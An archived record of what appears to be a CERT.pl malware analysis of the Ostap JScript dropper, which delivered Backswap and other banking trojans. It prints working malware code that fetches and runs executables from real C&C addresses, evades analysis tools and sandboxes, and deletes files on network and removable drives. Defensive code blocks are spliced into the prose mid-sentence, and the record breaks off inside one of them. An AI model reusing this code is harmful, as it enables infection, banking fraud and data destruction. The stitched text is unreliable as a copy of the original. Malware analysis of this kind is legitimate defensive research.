{
	"id": "dd60bf7a-5ce6-4fe7-9b43-fe878f28c86e",
	"created_at": "2026-04-06T00:18:59.974033Z",
	"updated_at": "2026-04-10T03:21:40.724958Z",
	"deleted_at": null,
	"sha1_hash": "b224dcbbd8f5068ca670ef21e0b3d212595f4fb6",
	"title": "Ostap malware analysis (Backswap dropper)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 274766,
	"plain_text": "Ostap malware analysis (Backswap dropper)\r\nArchived: 2026-04-05 22:02:13 UTC\r\nMalicious scripts distributed via spam e-mails have been getting more complex for some time. Usually, if you got an e-mail with a .js attachment, you could safely assume it was just a simple dropper, limited to downloading and executing malware. Unfortunately, there is a growing number of campaigns these days where the script doesn’t exit after downloading the sample. Instead of ending its life, it remains active, waiting for additional commands or more samples to fetch. Some examples are vjw0rm, used in Vortex ransomware campaigns, and Ostap, the main protagonist of our story.\r\nThis article is an introduction to the analysis of Backswap, a second-stage malware downloaded by Ostap. Our analysis of Backswap will be published soon!\r\nOstap has become very popular malware worldwide, but the most interesting campaigns observed by CERT.pl occurred in Poland. It is mostly used for banking malware distribution. Currently it distributes two banker families simultaneously: Nymaim and Backswap, which is actually a slightly modified Tinba. Because both malware families are dropped at the same time, there is a specific correlation between them, noticed by ESET in their Backswap analysis. Analyses of both banker families can also be found on our webpage.\r\nhttps://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/\r\nPage 1 of 19\r\nThe script is delivered as a compressed attachment (a fake invoice). It has an .rar extension, but don’t be fooled: it is actually an ACE archive. This is a common technique used to mislead automatic analyzers which identify a file type by its extension. Despite that, WinRAR is able to recognize the real archive format, so victims have no problem executing the Ostap script with that software.\r\n2e2096cbf17506a19e0389281333a3e2 FV-028534679112.rar\r\nContents of archive FV-028534679112.rar\r\nDate Time Packed Size Ratio File\r\n28.05.18 23:20 33712 631230 5% FV-024209564418.jse\r\nlisted: 1 files, totaling 631.230 bytes (compressed 33.712)\r\nThe archive contains a JSE file, which is an encoded JScript. Because of the obfuscation method used (characteristic for this malware), the file is rather large and can exceed several hundred kilobytes in size.\r\nFirst Ostap campaigns (2016)\r\nThe first campaigns were observed by CERT.pl in May 2016. In the first versions, Ostap was just a simple dropper which uninstalled itself after completing its mission. The characteristic part was the obfuscation method mentioned before: strings were assembled char-by-char from complex expressions evaluated by the JScript interpreter.\r\npre_Additionally6=this[{y3:'\\u0041'}.y3+{RL02:'\\u0063'}.RL02+\r\n{ar1:'\\u0074'}.ar1+{ar1:'\\u0069'}.ar1+{non0:'\\u0076'}.non0+{art1:'\\u0065'}.art1+\r\n{es3:'\\u0058'}.es3+{ls1:'\\u004f'}.ls1+{n0:'\\u0062'}.n0+{r0:'\\u006a'}.r0+\r\n{erv1:'\\u0065'}.erv1+{h0:'\\u0063'}.h0+{nfo3:'\\u0074'}.nfo3];var pre_communicating=this[{ay1:'\\u0057'}.ay1+{den0:'\\u0053'}.den0+\r\n{n1:'\\u0063'}.n1+{ers3:'\\u0072'}.ers3+{ont1:'\\u0069'}.ont1+{tor1:'\\u0070'}.tor1+\r\n{ay0:'\\u0074'}.ay0];\r\nAfter deobfuscation:\r\nvar pre_Additionally6 = this['ActiveXObject'];\r\nvar pre_information = WScript.CreateObject('WScript.Shell');\r\nvar pre_full = new ActiveXObject('Scripting.FileSystemObject');\r\nvar fstream = new ActiveXObject('ADODB.Stream');\r\nvar oShell = new ActiveXObject('Shell.Application');\r\nvar pre_sources = pre_information['ExpandEnvironmentStrings']('%TEMP%');\r\n// random numeric file name for the payload inside %TEMP%\r\nvar filepath = pre_sources + '\\\\' + Math['floor'](Math['random']() * (20 + 20 + 5 + 5 + 25 + 25) + 1) + '.exe';\r\nvar pre_information6 = new ActiveXObject('Msxml2.ServerXMLHTTP');\r\nvar body12 = '\\\\aflash_update.js';\r\nvar startupFolder = oShell['NameSpace'](7); // 7 = ssfSTARTUP, the user's Startup folder\r\nvar pre_that = false;\r\nvar pre_with = false;\r\nvar tone = 1;\r\nvar filets = null;\r\nvar pre_with = WScript.ScriptFullName;\r\nvar pre_includes = startupFolder.Self.Path + body12;\r\nvar pre_computer9 = 'https://217.28.218.217/YOP634EFARRR/q64.php?add=gtyhbncdfewpnjm9oklmnfdrtqdczdfgrt';\r\n// first run (script not yet running from Startup): remove the attachment and show a decoy error\r\nif (pre_with != pre_includes \u0026\u0026 pre_that == false) {\r\npre_that = true;\r\npre_full['DeleteFile'](pre_with);\r\nWScript.echo('The document is corrupted and cannot be opened');\r\nWScript.Sleep(5000);\r\n}\r\n// busy-loop delay before the first C\u0026C contact\r\nwhile (true) {\r\ntone = tone + 1;\r\nif (tone == 300000000) {\r\nwhile (true) {\r\ntry {\r\npre_information6['setOption'](3, 'MSXML');\r\npre_information6['open']('GET', pre_computer9 + '\u0026' + Math['floor'](Math['random']() * 200 + 1), false);\r\npre_information6['send']();\r\nif (pre_information6['status'] == 200) {\r\nif (pre_full['FileExists'](filepath))\r\npre_full['DeleteFile'](filepath);\r\nfstream['Open']();\r\nfstream['Type'] = 1; // adTypeBinary\r\nfstream['Write'](pre_information6['responseBody']);\r\nfstream['Position'] = 0;\r\nfstream['SaveToFile'](filepath);\r\nfstream['Close']();\r\nfilets = pre_full['GetFile'](filepath)['OpenAsTextStream'](1);\r\n// run the download only if it starts with the PE 'MZ' signature\r\nif (pre_full['FileExists'](filepath) \u0026\u0026 filets['ReadLine']()['substring'](0, 2) == 'MZ') {\r\npre_with = true;\r\noShell['ShellExecute'](filepath, '', '', 'open', '1');\r\nif (pre_full['FileExists'](WScript['ScriptFullName']))\r\npre_full['DeleteFile'](WScript['ScriptFullName']);\r\nWScript.Sleep(4000);\r\nif (pre_full['FileExists'](filepath))\r\npre_full['DeleteFile'](filepath);\r\n}\r\nfilets['Close']();\r\n}\r\n} catch (e) {\r\n}\r\nif (pre_with == true) {\r\nbreak;\r\n}\r\nWScript.Sleep(80000); // retry every 80 seconds\r\n}\r\nbreak;\r\n}\r\n}\r\nDuring execution, the script performed a few actions:\r\nShows the message The document is corrupted and cannot be opened\r\nAdds itself to the Startup folder oShell['NameSpace'](7), which ensured automatic execution on logon (in case the file was not available immediately)\r\nTries to download and execute an EXE file from the URL https://217.28.218.217/YOP634EFARRR/q64.php?add=gtyhbncdfewpnjm9oklmnfdrtqdczdfgrt\u0026\u003crandom number\u003e. In case of failure it tries again every 80 seconds.\r\nAfter successful download and installation, removes itself from Startup and deletes the downloaded file, ending its existence on the compromised host.\r\nSo, at first, Ostap was just a simple dropper, but a pretty characteristic one (e.g. because of the add= argument containing a campaign identifier, the obfuscation and the URL format). Samples downloaded by Ostap usually weren’t available immediately after the beginning of the campaign, and they were distributed only for a short period of time. 
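The obfuscation shown above is mechanical: every character is an object literal with one property whose value is a backslash-u escape, read straight back through the property name, and the pieces are joined with +. That makes the strings recoverable statically, without running the script in WSH or an emulator. The deobfuscator below is an added example written for this page, not code from CERT.pl or from the malware itself; decodeTerm, deobfuscate and term are this example's own names, and the sample input is rebuilt from the two obfuscated statements quoted above using the same property names and code points.

```javascript
// Added example: static deobfuscator for Ostap's char-by-char string building.
// Each term looks like {name:'<backslash>uXXXX'}.name and the real string is the
// concatenation of all terms joined with '+'. Not code from the malware or from
// the CERT.pl write-up; all helper names are this example's own.

var Q = String.fromCharCode(39);        // single quote
var BS = String.fromCharCode(92);       // backslash
var CRLF = String.fromCharCode(13, 10); // line break used inside the sample

var IDENT = /^[A-Za-z_$][A-Za-z0-9_$]*$/;
var HEX4 = /^[0-9A-Fa-f]{4}$/;

function isSpace(code) {
  return code === 32 || code === 9 || code === 10 || code === 13;
}

// Try to read one obfuscated term starting at pos.
// Returns {ch: decodedChar, end: indexAfterTerm} or null if there is no term here.
function decodeTerm(text, pos) {
  if (text.charAt(pos) !== '{') return null;
  var colon = text.indexOf(':', pos);
  if (colon < 0) return null;
  var name = text.substring(pos + 1, colon);
  if (!IDENT.test(name)) return null;
  // expect :'<backslash>uXXXX'}.name after the property name
  if (text.charAt(colon + 1) !== Q) return null;
  if (text.charAt(colon + 2) !== BS || text.charAt(colon + 3) !== 'u') return null;
  var hex = text.substring(colon + 4, colon + 8);
  if (!HEX4.test(hex)) return null;
  if (text.charAt(colon + 8) !== Q || text.charAt(colon + 9) !== '}') return null;
  if (text.charAt(colon + 10) !== '.') return null;
  var after = colon + 11 + name.length;
  if (text.substring(colon + 11, after) !== name) return null;
  // the property access must end here, otherwise {ar1:...}.ar10 would be accepted
  if (after < text.length && /[A-Za-z0-9_$]/.test(text.charAt(after))) return null;
  return { ch: String.fromCharCode(parseInt(hex, 16)), end: after };
}

// Rewrite every maximal run of terms joined by '+' (whitespace and line breaks
// allowed around the '+') as one single-quoted string literal; copy everything
// else through unchanged.
function deobfuscate(text) {
  var out = '';
  var i = 0;
  while (i < text.length) {
    var t = decodeTerm(text, i);
    if (t === null) { out += text.charAt(i); i++; continue; }
    var decoded = t.ch;
    var j = t.end;
    for (;;) {
      var k = j;
      while (k < text.length && isSpace(text.charCodeAt(k))) k++;
      if (text.charAt(k) !== '+') break;
      k++;
      while (k < text.length && isSpace(text.charCodeAt(k))) k++;
      var n = decodeTerm(text, k);
      if (n === null) break;
      decoded += n.ch;
      j = n.end;
    }
    // escape single quotes inside the decoded text before quoting it
    out += Q + decoded.split(Q).join(BS + Q) + Q;
    i = j;
  }
  return out;
}

// Constructed sample input: the two obfuscated statements quoted from the 2016
// sample above, rebuilt with the same property names and code points.
function term(name, hex) {
  return '{' + name + ':' + Q + BS + 'u' + hex + Q + '}.' + name;
}
var SAMPLE =
  'pre_Additionally6=this[' + [
    term('y3', '0041'), term('RL02', '0063'), term('ar1', '0074'), term('ar1', '0069'),
    term('non0', '0076'), term('art1', '0065'), term('es3', '0058'), term('ls1', '004f'),
    term('n0', '0062'), term('r0', '006a'), term('erv1', '0065'), term('h0', '0063'),
    term('nfo3', '0074')
  ].join('+' + CRLF) + '];var pre_communicating=this[' + [
    term('ay1', '0057'), term('den0', '0053'), term('n1', '0063'), term('ers3', '0072'),
    term('ont1', '0069'), term('tor1', '0070'), term('ay0', '0074')
  ].join('+') + '];';

var DECODED = deobfuscate(SAMPLE);
```

Running deobfuscate over a whole script body (after the JScript.Encode layer of the .jse has been removed) collapses the string-building expressions into literals, so the this[...] lookups, ActiveX ProgIDs and C&C URL read directly, which is what the deobfuscated listings in this article show. Only the backslash-u form shown on this page is handled; terms whose property value is anything else are copied through untouched.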
Downloaded malware samples were usually bankers: KBot and Gozi ISFB.\r\nA month later, in June 2016, we found the next version of Ostap, sending additional information about the victim environment.\r\nvar pre_written = 'https://217.29.58.174:4433/MIKE/ostap.php?add=fty7ygvhuijhbvfdew2erfvghu8ujhvfcdxe4r5t6y';\r\nvar char123 = '\\\\';\r\nvar pre_imagery = temp12 + char123 + Math.floor(Math.random() * (50 + 50) + 1) + '.exe';\r\nvar pre_dawn = temp12 + char123 + Math.floor(Math.random() * (50 + 50) + 1) + '.xmp';\r\nvar pre_right = new pre_known('Msxml2.ServerXMLHTTP');\r\nvar body12 = char123 + 'adobe_update.js';\r\n// ...\r\n// victim id: string hash over Startup path + script name + COMPUTERNAME\r\nvar hashhere = 0;\r\nvar autor = startupFolder.Self.Path + body12;\r\nvar uidhere = autor;\r\nuidhere = uidhere + pre_voices['Environment']('PROCESS')['Item']('COMPUTERNAME');\r\nfor (pre_either10 = 0; pre_either10 \u003c uidhere.length; pre_either10++) {\r\n// '+' binds tighter than '\u0026', so the whole 31*h + c sum is truncated to a signed 32-bit value each round\r\nhashhere = (hashhere \u003c\u003c 5) - hashhere + uidhere['charCodeAt'](pre_either10) \u0026 4294967295;\r\n}\r\npre_right['setOption'](1 + 2, 'MSXML');\r\npre_right['open']('GET',\r\npre_written +\r\n'\u0026' + Math['floor'](Math['random']() * 100 + 1) +\r\n'\u0026uid=' + Math['abs'](hashhere) +\r\n'\u0026out=' + out123 +\r\n'\u0026ver=' + pre_either10, false);\r\npre_right['send']();\r\nThe C\u0026C address was slightly different and contained more fields:\r\nhttps://\u003cip:port\u003e/\u003cpath .php\u003e?add=\u003ccampaign id\u003e\u0026\u003crandom\u003e\u0026uid=\u003cvictim id\u003e\u0026out=\u003c0|1\u003e\u0026ver=\u003cversion\u003e\r\nThe meaning of each field is described below:\r\nuid – hash of the Startup path and computer name\r\nver – operating system version (based on the existence of the Users substring in %HOMEPATH%)\r\nout=1 – an additional request sent after a successful download\r\nThe C\u0026C was delivering malware encoded in Base64. Ostap was performing the decoding using the built-in certutil command. Also, the new version contained some fail-safe methods of malware execution:\r\nout = 1;\r\ntry {\r\n// 1) WScript.Shell.Exec, reporting the child process id\r\npre_head = pre_voices['Exec'](pre_imagery);\r\nout = pre_head['ProcessID'];\r\n} catch (e) {\r\ntry {\r\n// 2) Shell.Application.ShellExecute\r\noShell['ShellExecute'](pre_imagery, '', '', 'open', 0);\r\nout = 2;\r\n} catch (e) {\r\n// 3) last resort: launch through cmd.exe (%COMSPEC%)\r\ncmd12 = cmd12 + pre_imagery;\r\noShell['ShellExecute']('%COMSPEC%', cmd12, '', 'open', 0);\r\nout = 3;\r\n}\r\n}\r\nThe criminals were showing their (kind of) creativity, sometimes adding a bitmap file to the ACE archives.\r\nA few months later, the script started to deliver various types of banking malware such as Tinba, Ramnit or ISFB. Since then, Ostap (named after the ostap.php script name) was slowly becoming a serious piece of malware.\r\nBecause of the variety of samples and the number of parallel campaigns, we began to suspect that Ostap is used as a distribution service and that the delivered software is not associated with a single actor. From 2016 on, Ostap was getting more and more active.\r\nDropper evolves to botnet (2017)\r\nFrom mid-2017, Ostap became more powerful. The first thing developed in the 2017 version was a set of anti-analysis techniques.\r\nGathering information about the execution environment\r\nBefore Ostap launches, the malware executes WMI queries requesting the list of active processes, user name, domain name, version of the operating system etc.\r\nvar sysInfo = \"\";\r\nvar procInfo = \"\";\r\nobj00WMI = GetObject(\"winmgmts:{impersonationLevel=impersonate}!\\\\\\\\.\\\\root\\\\cimv2\");\r\nwin32Process = new Enumerator(obj00WMI[\"ExecQuery\"](\"Select * from Win32_Process\"));\r\nwin32OperatingSystem = new Enumerator(obj00WMI[\"ExecQuery\"](\"Select * from Win32_OperatingSystem\"));\r\n// OS caption and version, concatenated without a separator\r\nwhile (!win32OperatingSystem[\"atEnd\"]()) {\r\nsysInfo = sysInfo + win32OperatingSystem[\"item\"]()[\"Caption\"] + win32OperatingSystem[\"item\"]()[\"Version\"];\r\nwin32OperatingSystem[\"moveNext\"]();\r\n}\r\n// one line per process: name*path*DOMAIN|user, CRLF-terminated\r\nwhile (!win32Process[\"atEnd\"]()) {\r\nprocessItem = win32Process[\"item\"]();\r\nprocessOwner = processItem[\"ExecMethod_\"](\"GetOwner\");\r\nprocInfo = procInfo + processItem[\"Name\"] + \"*\" + processItem[\"ExecutablePath\"] + \"*\" + processOwner[\"Domain\"] + \"|\" + processOwner[\"User\"] + String[\"fromCharCode\"](13) + String[\"fromCharCode\"](10);\r\nwin32Process[\"moveNext\"]();\r\n}\r\nThe output from sysInfo and procInfo is then concatenated:\r\nMicrosoft Windows XP Professional5.1.2600\r\nSystem Idle Process*null*DESKTOP_XXXXX|Zosia\r\nSystem*null*DESKTOP_XXXXX|Zosia\r\nsmss.exe*C:\\WINDOWS\\System32\\smss.exe*DESKTOP_XXXXX|Zosia\r\ncsrss.exe*null*DESKTOP_XXXXX|Zosia\r\nwinlogon.exe*C:\\WINDOWS\\system32\\winlogon.exe*DESKTOP_XXXXX|Zosia\r\nservices.exe*C:\\WINDOWS\\system32\\services.exe*DESKTOP_XXXXX|Zosia\r\nlsass.exe*C:\\WINDOWS\\system32\\lsass.exe*DESKTOP_XXXXX|Zosia\r\nsvchost.exe*C:\\WINDOWS\\system32\\svchost.exe*DESKTOP_XXXXX|Zosia\r\nsvchost.exe*null*DESKTOP_XXXXX|Zosia\r\nsvchost.exe*C:\\WINDOWS\\System32\\svchost.exe*DESKTOP_XXXXX|Zosia\r\nsvchost.exe*null*DESKTOP_XXXXX|Zosia\r\nsvchost.exe*null*DESKTOP_XXXXX|Zosia\r\nspoolsv.exe*C:\\WINDOWS\\system32\\spoolsv.exe*DESKTOP_XXXXX|Zosia\r\nexplorer.exe*C:\\WINDOWS\\Explorer.EXE*DESKTOP_XXXXX|Zosia\r\nctfmon.exe*C:\\WINDOWS\\system32\\ctfmon.exe*DESKTOP_XXXXX|Zosia\r\nmsmsgs.exe*C:\\Program Files\\Messenger\\msmsgs.exe*DESKTOP_XXXXX|Zosia\r\nsvchost.exe*null*DESKTOP_XXXXX|Zosia\r\nalg.exe*null*DESKTOP_XXXXX|Zosia\r\nwscntfy.exe*C:\\WINDOWS\\system32\\wscntfy.exe*DESKTOP_XXXXX|Zosia\r\nsvchost.exe*C:\\WINDOWS\\System32\\svchost.exe*DESKTOP_XXXXX|Zosia\r\ndllhost.exe*C:\\WINDOWS\\system32\\dllhost.exe*DESKTOP_XXXXX|Zosia\r\nmsdtc.exe*null*DESKTOP_XXXXX|Zosia\r\ncmd.exe*C:\\WINDOWS\\system32\\cmd.exe*DESKTOP_XXXXX|Zosia\r\nwmiprvse.exe*null*DESKTOP_XXXXX|Zosia\r\nwscript.exe*C:\\WINDOWS\\system32\\wscript.exe*DESKTOP_XXXXX|Zosia\r\nThen, Ostap looks for occurrences of several names characteristic for analysis tools and sandbox environments:\r\n// some entries match the DOMAIN|user part of a line (a known sandbox host or user name) rather than a process\r\nif (procInfo[\"indexOf\"](\"Procmon\") != -1 ||\r\nprocInfo[\"indexOf\"](\"Wireshark\") != -1 ||\r\nprocInfo[\"indexOf\"](\"Temp\\\\iexplore.exe\") != -1 ||\r\nprocInfo[\"indexOf\"](\"ProcessHacker\") != -1 ||\r\nprocInfo[\"indexOf\"](\"vmtoolsd\") != -1 ||\r\nprocInfo[\"indexOf\"](\"VBoxService\") != -1 ||\r\nprocInfo[\"indexOf\"](\"python\") != -1 ||\r\nprocInfo[\"indexOf\"](\"Proxifier.exe\") != -1 ||\r\nprocInfo[\"indexOf\"](\"Johnson-PC\") != -1 ||\r\nprocInfo[\"indexOf\"](\"ImmunityDebugger.exe\") != -1 ||\r\nprocInfo[\"indexOf\"](\"lordPE.exe\") != -1 ||\r\nprocInfo[\"indexOf\"](\"ctfmon.exe*JOHN-PC\") != -1 ||\r\nprocInfo[\"indexOf\"](\"BehaviorDumper\") != -1 ||\r\nprocInfo[\"indexOf\"](\"anti-virus.EXE\") != -1 ||\r\nprocInfo[\"indexOf\"](\"AgentSimulator.exe\") != -1 ||\r\nprocInfo[\"indexOf\"](\"VzService.exe\") != -1 ||\r\nprocInfo[\"indexOf\"](\"VmRemoteGuest\") != -1 ||\r\nprocInfo[\"indexOf\"](\"SystemIT|admin\") != -1)\r\n{\r\ndocument[\"alert\"](\"Screw you guys, Im going home!!!!\");\r\n}\r\nIf a characteristic name is found, Ostap calls the document.alert method. The document object doesn’t exist in the Windows Script Host context (it is seen only in web browsers), which raises an unhandled exception and stops the execution.\r\nAfter gathering information from WMI, the script copies itself to Startup and goes to the main part.\r\nCommunication with C\u0026C (downloading malicious samples)\r\nThe URL pattern used by Ostap from 2017 was very similar. 
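The uid parameter introduced in the June 2016 version (shortened to u in the 2017 format described below) is the 31-based string hash from the ostap.php listing above: the Startup folder path, the dropped script name and COMPUTERNAME are concatenated, hashed, truncated to a signed 32-bit integer on every round, and the absolute value is sent. Reimplementing it lets a responder recompute the uid for a suspected host and match it against C&C requests seen in proxy logs. The code below is an added example, not code from the malware or from CERT.pl: the Startup path and host names are constructed, adobe_update.js is the script name from the June 2016 sample, and findHostForUid is this example's own helper.

```javascript
// Added example: recompute Ostap's victim id (uid, later u) from the inputs the
// June 2016 sample hashes: <Startup folder path> + backslash + script name + COMPUTERNAME.
// Not code from the malware or from the CERT.pl write-up.

var BS = String.fromCharCode(92); // backslash

// Same arithmetic as the malware loop:
//   h = (h << 5) - h + charCode & 4294967295
// '+' binds tighter than '&', so the whole 31*h + c sum is truncated to a signed
// 32-bit integer each round (4294967295 converts to -1 for the '&' operator).
// This is the classic Java-style String.hashCode.
function ostapHash(str) {
  var h = 0;
  for (var i = 0; i < str.length; i++) {
    h = (h << 5) - h + str.charCodeAt(i) & 4294967295;
  }
  return h;
}

// uid as sent on the wire: Math.abs of the signed hash, so 0..2147483648.
function ostapUid(startupPath, computerName, scriptName) {
  if (scriptName === undefined) scriptName = 'adobe_update.js'; // name from the June 2016 sample
  return Math.abs(ostapHash(startupPath + BS + scriptName + computerName));
}

// Given a uid seen in a C&C request, the Startup path used by the victims
// (same for every user on a given Windows version apart from the user name
// component) and a list of candidate computer names, return the host that
// produces that uid, or null if none does.
function findHostForUid(observedUid, startupPath, computerNames) {
  for (var i = 0; i < computerNames.length; i++) {
    if (ostapUid(startupPath, computerNames[i]) === observedUid) return computerNames[i];
  }
  return null;
}

// Constructed sample host (not from the report).
var SAMPLE_STARTUP = ['C:', 'Users', 'Zosia', 'AppData', 'Roaming', 'Microsoft',
                      'Windows', 'Start Menu', 'Programs', 'Startup'].join(BS);
var SAMPLE_HOST = 'DESKTOP_XXXXX';
var SAMPLE_UID = ostapUid(SAMPLE_STARTUP, SAMPLE_HOST);
var MATCHED_HOST = findHostForUid(SAMPLE_UID, SAMPLE_STARTUP, ['PC-1', 'DESKTOP_XXXXX', 'PC-2']);
```

Math.abs folds the sign, so the value on the wire never exceeds 2147483648; a log search can treat any larger uid or u value as not produced by this routine. Because the Startup path includes the user profile directory, the hash changes with the Windows user name as well as with COMPUTERNAME, so both must be known to reproduce a given uid.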
However, few communication\r\naspects changed from the 2016 version.\r\nRequest method changed from GET to POST\r\nOstap sends fetched sysInfo+procInfo as request body\r\nArgument names were shortened (uid becomes u)\r\nC\u0026C server sends additional information about blob format and method of sample\r\nexecution:\r\nFile could be sent raw or Base64-encoded (Content-Transfer-Encoding was set to\r\nbinary or base64)\r\nhttps://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/\r\nPage 11 of 19\n\nThere were few methods of execution, based on you_god_damn_right HTTP response\r\nheader value (actual name differs depending on the malware version)\r\nYup, Ostap is full of “Breaking bad” quotes.\r\nPossible values of you_god_damn_right are:\r\n0 – file is an update (replace the original script and execute, closing itself)\r\n1 – run DLL file (with secretFunction as entrypoint)\r\n2 – install software silently with Administrator privileges (MSI installer)\r\nBy default, fetched file was run using cmd /c start \u003cfile path\u003e\r\nAfter successful installation – script removes all files from TEMP folder which were\r\npotentially associated with fetched sample (.exe, .gop – base64 encoded, .txt, .log, *.jse –\r\nupdate)\r\nDestructive propagation on removable media and network shares\r\nIf creation of file after download was unsuccessful (file still doesn’t exist under expected\r\nlocation) – Ostap becomes more nasty than usual.\r\nvar fso = new ActiveXObject(\"Scripting.FileSystemObject\");\r\nvar extensions = \"*.doc *.xls *.pdf *.rtf *.txt *.pub *.odt *.ods *.odp *.odm *.odc\r\n*.odb *.wps *.xlk *.ppt *.mdb *.accdb *.pst *.dwg *.dxf *.dxg *.wpd\";\r\nvar wshShell = WScript[\"CreateObject\"](\"WScript.Shell\");\r\nvar tempDir = wshShell[\"ExpandEnvironmentStrings\"](\"%TEMP%\");\r\nhttps://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/\r\nPage 12 of 19\n\nvar userProfile = 
wshShell[\"ExpandEnvironmentStrings\"](\"%USERPROFILE%\");\r\nvar DRIVE_REMOVABLE = 1;\r\nvar DRIVE_NETWORK = 3\r\nvar listFileName = \"saymyname.txt\";\r\nif (!fso[\"FileExists\"](droppedFileName)) {\r\ntry {\r\ndrives = new Enumerator(fso.Drives);\r\nfor (;!drives[\"atEnd\"](); drives[\"moveNext\"]()) {\r\ndriveItem = drives[\"item\"]();\r\nif (driveItem[\"IsReady\"] \u0026\u0026\r\n(driveItem[\"DriveType\"] == DRIVE_NETWORK || driveItem[\"DriveType\"] ==\r\nDRIVE_REMOVABLE) \u0026\u0026\r\nuserProfile[\"substring\"](0, 1) != driveItem[\"DriveLetter\"])\r\n{\r\noShell23[\"ShellExecute\"](\"cmd\", \"/U /Q /C cd /D \" + graplingmore67[\"DriveLetter\"]\r\n+ \": \u0026\u0026 dir /b/s/x \" + extensions + \"\u003e\u003e%TEMP%\\\\\" + listFile, \"\", \"open\", 0);\r\nWScript[\"Sleep\"](90000);\r\n}\r\n}\r\nWScript[\"Sleep\"](30000);\r\nlistFile = fso[\"GetFile\"](tempDir + \"\\\\\" + listFile)[\"OpenAsTextStream\"](1, -1);\r\nwhile (!listFile[\"AtEndOfStream\"]) {\r\nfileToReplace = listFile[\"ReadLine\"]();\r\nnamePart = fileToReplace[\"substring\"](0, fileToReplace[\"indexOf\"](\".\"));\r\noShell23[\"ShellExecute\"](\"cmd\", \"/U /Q /C copy /Y \\\"\" + selfFile + \"\\\" \\\"\" +\r\nnamePart + \".jse\\\" \u0026\u0026 del /Q/F \\\"\" + fileToReplace + \"\\\"\", \"open\", 0);\r\n}\r\nhttps://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/\r\nPage 13 of 19\n\nlistFile[\"Close\"]();\r\nfso[\"DeleteFile\"](tempDir + '\\\\' + listFile);\r\n} catch (zsxdcfvgbhnj) {}\r\nout123 = 0;\r\ngraplingprimarily24 = false;\r\ncontinue;\r\n}\r\nAt the beginning, script was preparing a list of files with specified extensions, which are\r\nlocated on removable media and mounted network shares. List of files found was written to\r\ntemporary file saymyname.txt.\r\nThen, based on that list – all files were deleted and replaced by Ostap copy (with preserved\r\nname and added .jse extension). 
The purpose was probably to “punish” incautious analysts,\r\nwhich can accidentally trigger that code by script modifications.\r\nhttps://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/\r\nPage 14 of 19\n\nPersistence\r\nStarting from 2017, Ostap doesn’t erase itself after successful download anymore. Using\r\nself-update capabilities, malware persists on infected machine, serving banking malware\r\nfrom various families. The victim becomes a part of distribution botnet.\r\nCurrent version (2018)\r\nCurrently, Ostap is one of the most active families targeting the online banking customers in\r\nPoland. Malware code is being constantly developed and improved.\r\nVersion from 2018 has added few more methods of sandbox detection:\r\nMalware doesn’t execute on Windows XP\r\nhttps://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/\r\nPage 15 of 19\n\nOstap verifies length of process list (\u003e1500 characters is needed, which was efective\r\nagainst emulation using tools like box-js)\r\nFew strings were added to blacklist:\r\nMicrosoft Windows XP\r\n2B.exe\r\nProcmon\r\nWireshark\r\nTemp\\iexplore.exe\r\nProcessHacker\r\nvmtoolsd\r\nVBoxService\r\npython\r\nProxifier.exe\r\nJohnson\r\nImmunityDebugger.exe\r\nlordPE.exe\r\nctfmon.exe*JOHN-PC\r\nBehaviorDumper\r\nanti-virus.EXE\r\nAgentSimulator.exe\r\nVzService.exe\r\nVBoxTray.exe\r\nVmRemoteGuest\r\nSystemIT|admin\r\nWIN7-TRAPS\r\nEmily\\AppData\r\nPROCMON\r\nprocexp\r\nhttps://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/\r\nPage 16 of 19\n\ntcpdump\r\nFrzState2k\r\nDFLocker64\r\nvmware\r\nLOGSystem.Agent.Service.exe\r\nC:\\Users\\user\\\r\nC:\\Users\\milozs\\\r\nIf a sandbox substring was detected:\r\nMalware executes ploha[‘show’](‘No more half-measures.’); which triggers\r\nundefined variable exception (ploha doesn’t exist in the code)\r\nIf exception is not raised (or handled externally) – Ostap tries to terminate script\r\nusing WScript.Quit()\r\nIf 
script is still working – “destructive propagation” is activated\r\nDestructive propagation has additional condition now – if file creation was unsuccessful and\r\nsandbox was detected without script termination, malware starts removing files.\r\nThe URL address was also slightly changed:\r\nhttps://185.159.82.230/gazprom8/milertut.php?\r\nDeretghrttLolookest75=awsedrftgyhujiko\u0026add=james\u0026u=\u003cuid\u003e\u0026o=\u003cout\u003e\u0026v=\r\n\u003cver\u003e\u0026s=\u003crandom\u003e\r\nNow, the add parameter isn’t the campaign identifier – that role is taken over by\r\nDeretghrttLolookest75=awsedrftgyhujiko, which changes depending on the sample.\r\nIn latest version – HTTP execution method header is also different:\r\nWe_are_done_when_I_say_we_are_done, as well as message displayed after executing\r\nscript first time, which changed to PDF Error: The document could not be printed..\r\nhttps://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/\r\nPage 17 of 19\n\nSummary\r\nOstap shows how simple dropper script can evolve into real botnet malware. 
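The request formats quoted throughout this article (the 2016 GET requests with add=<campaign id>&<random>, optionally followed by uid, out and ver, and the 2018 form with <campaign_id1>=<campaign_id2>&add=james&u=&o=&v=&s=) are specific enough to hunt for in proxy logs: a bare IP host, a .php path and a fixed parameter order. The matcher below is an added example, not code from CERT.pl; the log line format and the client addresses are constructed, the hosts and paths are the ones quoted in this article, and the 2017 variant is not matched separately because its full URL is not reproduced here.

```javascript
// Added example: flag Ostap C&C requests in a proxy log by URL shape.
// Covers the 2016 GET form  https://<ip[:port]>/<path>.php?add=<id>&<random>[&uid=&out=&ver=]
// and the 2018 form         https://<ip[:port]>/<path>.php?<id1>=<id2>&add=<word>&u=&o=&v=&s=
// Not code from CERT.pl; the log lines below are constructed.

var IP_HOST = '([0-9]{1,3}([.][0-9]{1,3}){3})(:[0-9]+)?';

// groups: 1 ip, 3 port, 4 campaign_id1, 5 campaign_id2, 6 add, 7 u, 8 o, 9 v, 10 s
var RE_2018 = new RegExp('^https://' + IP_HOST + '/[^?]*[.]php[?]' +
  '([A-Za-z0-9_]+)=([A-Za-z0-9]+)&add=([A-Za-z0-9]+)&u=([0-9]+)&o=([0-9]+)&v=([0-9]+)&s=([0-9]+)$');

// groups: 1 ip, 3 port, 4 add (campaign id), 5 random, 7 uid, 8 out, 9 ver
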